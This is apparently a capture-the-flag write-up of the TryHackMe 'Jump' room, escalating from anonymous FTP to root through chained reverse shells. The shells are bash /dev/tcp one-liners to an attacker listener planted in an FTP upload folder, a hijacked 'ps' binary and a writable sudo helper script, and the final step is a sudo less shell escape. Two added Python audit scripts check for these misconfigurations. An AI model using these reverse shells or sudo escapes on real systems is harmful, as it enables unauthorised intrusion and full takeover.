Jump (TryHackMe)
Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

Link to the privilege escalation challenge on TryHackMe: Jump

Challenge

You’ve discovered a misconfigured internal automation pipeline running on a Linux server. The system processes recon scripts, development backups, monitoring jobs, and deployment tasks across multiple users. Each stage of the pipeline relies too heavily on the previous one. By abusing these trust boundaries, you must move laterally through the system.

Your objective is to escalate from anonymous access all the way through:

recon_user → dev_user → monitor_user → ops_user → root

Answer the questions below

What is the flag found in the recon_user’s home directory?

nmap -p- -sV IP_Address

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0)
ftp IP_Address
Connected to IP_Address
220 (vsFTPd 3.0.5)
Name (10.112.141.252:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||46836|)
150 Here comes the directory listing.
drwxrwxrwx    2 115      123          4096 Apr 30 06:00 incoming
drwxr-xr-x    4 115      123          4096 Jun 09 08:22 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||29851|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             139 Feb 02 07:19 README.txt
drwxr-xr-x    2 115      123          4096 Feb 01 11:12 archive
drwxrwxrwx    2 115      123          4096 Feb 01 11:12 uploads
226 Directory send OK.
ftp> get README.txt
local: README.txt remote: README.txt
229 Entering Extended Passive Mode (|||49715|)
150 Opening BINARY mode data connection for README.txt (139 bytes).
100% |*************************************************************************************|   139      377.06 KiB/s    00:00 ETA
226 Transfer complete.
139 bytes received in 00:00 (98.22 KiB/s)
ftp> get archives
local: archives remote: archives
229 Entering Extended Passive Mode (|||41683|)
550 Failed to open file.
ftp> get archive
local: archive remote: archive
229 Entering Extended Passive Mode (|||13194|)
550 Failed to open file.
ftp> cd archive
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||49853|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||40772|)
150 Here comes the directory listing.
drwxr-xr-x    2 115      123          4096 Feb 01 11:12 .
drwxr-xr-x    4 115      123          4096 Jun 09 08:22 ..
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> cd uploads
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||56647|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||12879|)
150 Here comes the directory listing.
drwxrwxrwx    2 115      123          4096 Feb 01 11:12 .
drwxr-xr-x    4 115      123          4096 Jun 09 08:22 ..
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||6197|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             139 Feb 02 07:19 README.txt
drwxr-xr-x    2 115      123          4096 Feb 01 11:12 archive
drwxrwxrwx    2 115      123          4096 Feb 01 11:12 uploads
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||9375|)
150 Here comes the directory listing.
drwxrwxrwx    2 115      123          4096 Apr 30 06:00 incoming
drwxr-xr-x    4 115      123          4096 Jun 09 08:22 pub
226 Directory send OK.
ftp> cd incoming
250 Directory successfully changed.
ftp> ls 
229 Entering Extended Passive Mode (|||60214|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||17915|)
150 Here comes the directory listing.
drwxrwxrwx    2 115      123          4096 Apr 30 06:00 .
drwxr-xr-x    4 0        0            4096 Feb 02 06:29 ..
226 Directory send OK.
cat README.txt
[ recon pipeline ]

All recon jobs must be placed in incoming/.
Files are processed automatically on arrival.
Invalid formats are ignored.
nc -lvnp 4444
# Create the shell script
echo '#!/bin/bash
bash -i >& /dev/tcp/ATTACK_IP/4444 0>&1' > /tmp/shell.sh

# Upload via FTP
ftp TARGET_IP
# login as anonymous
cd incoming
put /tmp/shell.sh shell.sh
nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.112.141.252 60138
bash: cannot set terminal process group (2494): Inappropriate ioctl for device
bash: no job control in this shell
recon_user@tryhackme-2404:~$ ls
ls
flag.txt
shell.sh
recon_user@tryhackme-2404:~$ cat flag.txt
cat flag.txt
THM{5a3f1c92-7b4e-4d91-8c2a-REDACTED}

What is the flag found in the dev_user’s home directory?

pwd
pwd
/home/recon_user
recon_user@tryhackme-2404:~$ ls /home
ls /home
dev_user
monitor_user
ops_user
recon_user
ubuntu
recon_user@tryhackme-2404:~$ ls /home/dev_user
ls /home/dev_user
flag.txt
recon_user@tryhackme-2404:~$ cat /home/dev_user/flag.txt
cat /home/dev_user/flag.txt
THM{8d2b7a41-3f9c-4e55-b1a2-REDACTED}

What is the flag found in the monitor_user’s home directory?

nc -lvnp 5558
echo '#!/bin/bash
bash -i >& /dev/tcp/10.113.91.143/5558 0>&1' > /opt/dev/bin/ps
chmod +x /opt/dev/bin/ps
nc -lvnp 5556
Listening on 0.0.0.0 5556
Connection received on 10.113.152.106 43516
bash: cannot set terminal process group (4214): Inappropriate ioctl for device
bash: no job control in this shell
dev_user@tryhackme-2404:~$ echo '#!/bin/bash
> bash -i >& /dev/tcp/ATTACK_IP/5558 0>&1' > /opt/dev/bin/ps
dev_user@tryhackme-2404:~$ chmod +x /opt/dev/bin/ps
chmod +x /opt/dev/bin/ps
dev_user@tryhackme-2404:~$ echo '#!/bin/bash
> tar -czf /tmp/recon_backup.tgz /home/recon_user' > /opt/dev/backup.sh
dev_user@tryhackme-2404:~$ 
nc -lvnp 5558
Listening on 0.0.0.0 5558
Connection received on 10.113.152.106 47752
bash: cannot set terminal process group (597): Inappropriate ioctl for device
bash: no job control in this shell
monitor_user@tryhackme-2404:/$ cat /home/monitor_user/flag.txt
cat /home/monitor_user/flag.txt
THM{c1e9a7b3-2d44-4a88-9f7e-REDACTED}

What is the flag found in the ops_user’s home directory?

monitor_user@tryhackme-2404:/$ sudo -l
sudo -l
Matching Defaults entries for monitor_user on tryhackme-2404:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty, env_keep+=LESS

User monitor_user may run the following commands on tryhackme-2404:
    (ops_user) NOPASSWD: /usr/local/bin/deploy.sh
cat /usr/local/bin/deploy.sh
cat /usr/local/bin/deploy.sh
#!/bin/bash
cd /opt/app 2>/dev/null
./deploy_helper.sh
monitor_user@tryhackme-2404:/$ sudo -u ops_user LESS='!/bin/bash' /usr/local/bin/deploy.sh
[+] Deploy helper running
[+] Syncing application files
cat /opt/app/deploy_helper.sh
cat /opt/app/deploy_helper.sh
#!/bin/bash
echo "[+] Deploy helper running"
echo "[+] Syncing application files"
sleep 2
monitor_user@tryhackme-2404:/$ ls -la /opt/app/
ls -la /opt/app/
total 16
drwxr-xr-x 3 ops_user     ops_user     4096 Feb  2 15:09 .
drwxr-xr-x 5 root         root         4096 Feb  2 10:03 ..
drwxrwxr-x 2 monitor_user monitor_user 4096 Feb  2 15:09 data
-rwxr-xr-x 1 monitor_user monitor_user   90 Feb  2 14:59 deploy_helper.sh
monitor_user@tryhackme-2404:/$ pwd
pwd
/
monitor_user@tryhackme-2404:/$ ls /home/ops_user
ls /home/ops_user
ls: cannot open directory '/home/ops_user': Permission denied
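The `ls -la /opt/app/` listing above is the whole finding for this hop: `deploy.sh` runs as `ops_user` through sudo, but the helper it calls is owned by `monitor_user`, and its `cd /opt/app 2>/dev/null` ignores failure, so `./deploy_helper.sh` would otherwise resolve in whatever directory the caller started in. The following Python script is an added example, not code from the room or its author: it statically audits a sudo-launched wrapper for both defects, builds a constructed copy of the `/opt/app` layout in a temporary directory, and audits a hardened wrapper beside the weak one. The target uid is a placeholder for `ops_user`, and `deploy_helper_fixed.sh` is a name introduced here.

```python
"""Added audit for a sudo-launched wrapper such as /usr/local/bin/deploy.sh.

Flags a `cd` whose failure is ignored, a helper invoked by relative path, and a
helper (or its directory) that the sudo target does not own or that others can write.
"""
import os
import re
import stat
import tempfile


def _check_target(path: str, target_uid: int) -> list:
    """Ownership/permission checks for an invoked helper and its directory."""
    out = []
    for p in (path, os.path.dirname(path)):
        try:
            st = os.stat(p)
        except FileNotFoundError:
            out.append(("MISSING", p))
            continue
        if st.st_uid not in (0, target_uid):
            out.append(("FOREIGN_OWNER", f"{p} owned by uid {st.st_uid}, not root or {target_uid}"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            out.append(("WRITABLE", f"{p} mode {oct(st.st_mode & 0o777)}"))
    return out


def audit_wrapper(script_path: str, target_uid: int) -> list:
    """Return (code, detail) findings for a script that sudo runs as target_uid."""
    with open(script_path) as fh:
        lines = fh.read().splitlines()
    strict = any(re.match(r"\s*set\s+-\w*e", l) for l in lines)  # set -e aborts on a failed cd
    findings = []
    cwd = None  # None: still whatever directory the caller started in
    for raw in lines:
        line = raw.split("#", 1)[0].strip()  # drops comments and the shebang
        if not line:
            continue
        m = re.match(r"cd\s+(\S+)(.*)$", line)
        if m:
            cwd = m.group(1)
            if not strict and "||" not in m.group(2) and "&&" not in m.group(2):
                findings.append(("UNCHECKED_CD", f"cd {cwd}: failure ignored, later relative paths resolve in the caller's directory"))
            continue
        m = re.match(r"(\.{1,2}/\S+|/\S+)", line)
        if not m:
            continue  # builtins, echo, sleep and PATH lookups are outside this check
        target = m.group(1)
        if target.startswith("."):
            if cwd is None:
                findings.append(("RELATIVE_EXEC", f"{target}: runs from a caller-controlled directory"))
                continue
            findings.append(("RELATIVE_EXEC", f"{target}: relative to {cwd}"))
            target = os.path.normpath(os.path.join(cwd, target))
        findings.extend(_check_target(target, target_uid))
    return findings


def build_demo(root: str) -> tuple:
    """Constructed replica of /opt/app: the weak wrapper from the page and a fixed one."""
    app = os.path.join(root, "opt", "app")
    os.makedirs(app)
    os.chmod(app, 0o755)
    weak_helper = os.path.join(app, "deploy_helper.sh")
    fixed_helper = os.path.join(app, "deploy_helper_fixed.sh")  # name introduced here
    for path in (weak_helper, fixed_helper):
        with open(path, "w") as fh:
            fh.write('#!/bin/bash\necho "[+] Deploy helper running"\n')
    os.chmod(weak_helper, 0o775)   # group-writable: anyone in the owner's group can replace it
    os.chmod(fixed_helper, 0o755)  # in production also root-owned; chown is not possible here
    weak = os.path.join(root, "deploy.sh")
    with open(weak, "w") as fh:
        fh.write(f"#!/bin/bash\ncd {app} 2>/dev/null\n./deploy_helper.sh\n")
    fixed = os.path.join(root, "deploy_fixed.sh")
    with open(fixed, "w") as fh:
        fh.write(f"#!/bin/bash\nset -e\ncd {app}\n{fixed_helper}\n")
    return weak, fixed


def demo() -> dict:
    """Audit both wrappers; the target uid is a placeholder standing in for ops_user."""
    with tempfile.TemporaryDirectory() as root:
        weak, fixed = build_demo(root)
        placeholder_ops_uid = os.getuid() + 1
        return {"weak": audit_wrapper(weak, placeholder_ops_uid),
                "fixed": audit_wrapper(fixed, placeholder_ops_uid)}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(f"== {name} ==")
        for code, detail in findings:
            print(f"{code:14} {detail}")
```

The fixed wrapper changes three things: `set -e` so a failed `cd` stops the script, an absolute path to the helper, and a helper that is root-owned and writable only by its owner. The `FOREIGN_OWNER` code depends on who runs the demo, since every file in the temporary tree belongs to the current user; on the real box it is the finding that matters, because `deploy_helper.sh` belongs to the very user sudo is supposed to be protecting against.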
nc -lvnp 5559
echo '#!/bin/bash
bash -i >& /dev/tcp/10.113.91.187/5559 0>&1' > /opt/app/deploy_helper.sh

sudo -u ops_user /usr/local/bin/deploy.sh
nc -lvnp 5559
Listening on 0.0.0.0 5559
Connection received on 10.113.152.106 44302
bash: cannot set terminal process group (597): Inappropriate ioctl for device
bash: no job control in this shell
ops_user@tryhackme-2404:/opt/app$ pwd
pwd
/opt/app

ops_user@tryhackme-2404:/opt/app$ ls -la /home/ops_user
ls -la /home/ops_user
total 24
drwxr-x--- 2 ops_user ops_user 4096 Apr 26 19:39 .
drwxr-xr-x 7 root     root     4096 Apr 29 10:46 ..
-rw-r--r-- 1 ops_user ops_user  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 ops_user ops_user 3877 Apr 26 19:22 .bashrc
-rw-r--r-- 1 ops_user ops_user  807 Feb 25  2020 .profile
-rw-r--r-- 1 ops_user ops_user   42 Apr 26 19:39 flag.txt

ops_user@tryhackme-2404:/opt/app$ cat /home/ops_user/flag.txt
cat /home/ops_user/flag.txt
THM{f7a2c9d1-6e33-4b55-8d11-REDACTED}

What is the flag found in the root user's home directory?

ops_user@tryhackme-2404:/opt/app$ sudo -l
sudo -l
Matching Defaults entries for ops_user on tryhackme-2404:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty, env_keep+=LESS
User ops_user may run the following commands on tryhackme-2404:
    (root) NOPASSWD: /usr/bin/less
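The `sudo -l` output above combines two settings that undo each other's protection: `env_reset` is in force, but `env_keep+=LESS` hands a caller-controlled variable back to a program that already has an interactive shell escape, and the rule carries no `NOEXEC` tag. The Python below is an added example, not code from the room or its author: it parses `sudo -l` text (the sample is the output shown above, embedded as constructed input), flags kept environment variables and shell-escaping programs, and prints the sudoers lines that close each gap. The `RISKY_ENV` and `SHELL_ESCAPES` lists are curated here and extend beyond what the page shows.

```python
"""Added audit of `sudo -l` output for env_keep and shell-escape findings."""
import os
import re

# Variables that change what a privileged program executes or loads. LESS is the
# one this box keeps; the rest are well-known equivalents (curated here, not from the page).
RISKY_ENV = {"LESS", "LESSOPEN", "LESSCLOSE", "PAGER", "EDITOR", "VISUAL",
             "LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH", "PERL5OPT", "BASH_ENV", "ENV"}
# Programs with a documented interactive shell escape.
SHELL_ESCAPES = {"less", "more", "man", "vi", "vim", "nano", "find", "awk", "perl", "python3"}

# Constructed sample: the ops_user `sudo -l` output from this page.
SAMPLE = r"""Matching Defaults entries for ops_user on tryhackme-2404:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty, env_keep+=LESS
User ops_user may run the following commands on tryhackme-2404:
    (root) NOPASSWD: /usr/bin/less
"""


def parse_sudo_l(text: str) -> tuple:
    """Return (env_keep set, [(runas, tags, command)]) from `sudo -l` output."""
    env_keep, rules = set(), []
    for line in text.splitlines():
        line = line.strip().rstrip(",")
        # env_keep+=LESS or env_keep+="LESS LESSOPEN"
        for m in re.finditer(r'env_keep\+?=(?:"([^"]*)"|(\S+))', line):
            env_keep.update((m.group(1) or m.group(2)).split())
        # (runas) TAG: TAG: /path/one, /path/two
        m = re.match(r"\(([^)]+)\)\s+((?:[A-Z]+:\s*)*)(.+)$", line)
        if m:
            runas = m.group(1).split(":")[0].strip()
            tags = {t.strip() for t in m.group(2).split(":") if t.strip()}
            for cmd in m.group(3).split(","):
                rules.append((runas, tags, cmd.strip()))
    return env_keep, rules


def audit(text: str) -> list:
    """Return (code, detail) findings for the parsed sudo -l output."""
    env_keep, rules = parse_sudo_l(text)
    kept = sorted(env_keep & RISKY_ENV)
    findings = []
    for runas, tags, cmd in rules:
        prog = os.path.basename(cmd.split()[0])
        if prog in SHELL_ESCAPES and "NOEXEC" not in tags:
            findings.append(("SHELL_ESCAPE", f"({runas}) {cmd}: {prog} can run a shell from inside the program"))
        if kept:
            findings.append(("ENV_KEEP", f"({runas}) {cmd} inherits caller-controlled {', '.join(kept)}"))
        if cmd.endswith(".sh"):
            findings.append(("SCRIPT_RULE", f"({runas}) {cmd}: audit the script and every file it executes"))
    return findings


def hardened_lines(env_keep: set, rules: list) -> list:
    """sudoers lines that remove each finding (Defaults syntax from sudoers(5))."""
    out = [f'Defaults env_keep -= "{var}"' for var in sorted(env_keep & RISKY_ENV)]
    for _runas, _tags, cmd in rules:
        prog_path = cmd.split()[0]
        if os.path.basename(prog_path) in SHELL_ESCAPES:
            out.append(f"Defaults!{prog_path} noexec")
    return out


if __name__ == "__main__":
    for code, detail in audit(SAMPLE):
        print(f"{code:13} {detail}")
    print("-- suggested sudoers additions --")
    for line in hardened_lines(*parse_sudo_l(SAMPLE)):
        print(line)
```

Dropping `LESS` from `env_keep` removes the non-interactive trigger, and `noexec` stops `less` from spawning anything even when it is driven interactively. Neither change narrows what the pager may read as root, so the rule itself should also be limited to the specific files the monitoring job actually needs, or replaced by a script that prints them.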
sudo /usr/bin/less /etc/passwd
python3 -c 'import pty; pty.spawn("/bin/bash")'
ops_user@tryhackme-2404:/opt/app$ python3 -c 'import pty; pty.spawn("/bin/bash")'
ops_user@tryhackme-2404:/opt/app$ sudo /usr/bin/less /etc/passwd
sudo /usr/bin/less /etc/passwd
WARNING: terminal is not fully functional
Press RETURN to continue 

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbi
/etc/passwd!/bin/bash
!/bin/bash


root@tryhackme-2404:/opt/app# whoami
whoami
root
root@tryhackme-2404:/opt/app# cd /root
cd /root
root@tryhackme-2404:~# ls -la
ls -la
total 40
drwx------  5 root root 4096 Apr 26 19:40 .
drwxr-xr-x 22 root root 4096 Jun 23 11:57 ..
-rw-r--r--  1 root root 3212 Apr 26 19:22 .bashrc
-rw-------  1 root root   20 Apr 26 18:31 .lesshst
drwxr-xr-x  3 root root 4096 Oct 22  2024 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   66 Feb  2 06:34 .selected_editor
drwx------  2 root root 4096 Oct 22  2024 .ssh
-rw-r--r--  1 root root   42 Apr 26 19:39 flag.txt
drwxr-xr-x  4 root root 4096 Oct 22  2024 snap
root@tryhackme-2404:~# cat flag.txt
cat flag.txt
THM{2b8e6c4a-1d55-4f90-a3c7-REDACTED}